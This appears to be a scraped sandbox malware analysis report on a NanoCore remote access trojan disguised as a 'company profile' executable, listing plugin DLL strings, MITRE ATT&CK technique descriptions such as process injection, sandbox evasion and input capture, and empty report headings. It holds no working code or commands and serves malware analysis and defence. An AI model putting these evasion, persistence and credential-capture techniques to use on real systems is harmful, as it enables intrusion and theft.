Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe	Binary or memory string: OriginalFilenameDllImportAttribute.exe6 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report COMPANY PROFILE AND DOCUMENTED OFFER.scr

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre